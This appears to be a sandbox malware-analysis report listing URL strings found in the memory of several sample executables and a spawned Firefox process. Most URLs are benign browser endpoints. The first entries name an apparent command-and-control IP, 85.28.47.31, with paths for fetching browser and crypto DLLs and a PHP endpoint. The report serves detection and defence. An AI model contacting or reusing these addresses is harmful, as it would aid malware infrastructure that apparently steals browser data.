Source: file.exe, 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllO
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllc
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll5
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dllv:?
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2496187977.00000000027DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll1
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllV;
Source: file.exe, 00000000.00000002.2493886983.000000000046A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dllZ
Source: file.exe, 00000000.00000002.2496187977.000000000278B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/;1
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/=1
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/V
Source: 9fa327eb6c.exe, 00000015.00000002.2718500578.000000000259B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/dod
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/e
Source: file.exe, 00000000.00000002.2493886983.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 9fa327eb6c.exe, 00000015.00000002.2718319930.000000000253E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31E;
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31O
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002741000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31s1
Source: file.exe, 00000000.00000002.2496023494.000000000272E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31yd
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/JSONFile.sys.mjs
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/JSONFile.sys.mjsresource://gr
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 0000001F.00000002.2994122055.000001B116B65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3000161016.000001B1177BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/stringsp
Source: firefox.exe, 0000001F.00000002.3022925939.000001B40003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2994122055.000001B116B97000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967893682.000001B112B8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2978323155.000001B11559D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982408855.000001B115D80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2921837899.000001B1155DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2996759132.000001B1175C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2996759132.000001B11755B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982408855.000001B115DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982408855.000001B115D70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939237933.000001B1068C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2956400366.000001B1068B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2996759132.000001B1175A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2979155172.000001B115703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3006356102.000001B11BF36000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2984824415.000001B1161D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2996759132.000001B11758D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940922435.000001B1068BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3018521435.000001B11DD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2954167196.000001B1066D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 00000018.00000000.2712024873.0000000000E22000.00000080.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000000.2864690490.0000000000E22000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 00000018.00000000.2712024873.0000000000E22000.00000080.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000000.2864690490.0000000000E22000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 00000018.00000000.2712024873.0000000000E22000.00000080.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000B82000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000000.2864690490.0000000000E22000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-ocsp.symauth.com0
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: file.exe, file.exe, 00000000.00000002.2521033172.000000006C74D000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001F.00000002.3018521435.000001B11DD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 0000001F.00000002.3010160093.000001B11C260000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001F.00000002.2989528701.000001B11689F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989528701.000001B116803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2978854207.000001B115687000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001F.00000002.2980952151.000001B115B6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulgetAttrDataAsync:
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ExtensionPrefere
Source: file.exe, 00000000.00000002.2520774989.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916533692.000001B112E1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001F.00000002.2954167196.000001B1066BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001F.00000002.2970664695.000001B1136C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2970664695.000001B113680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001F.00000002.2987356094.000001B1165BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986979517.000001B116405000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001F.00000002.3004882202.000001B11BB39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 0000001F.00000002.2978854207.000001B115687000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 0000001F.00000002.2954167196.000001B10663A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
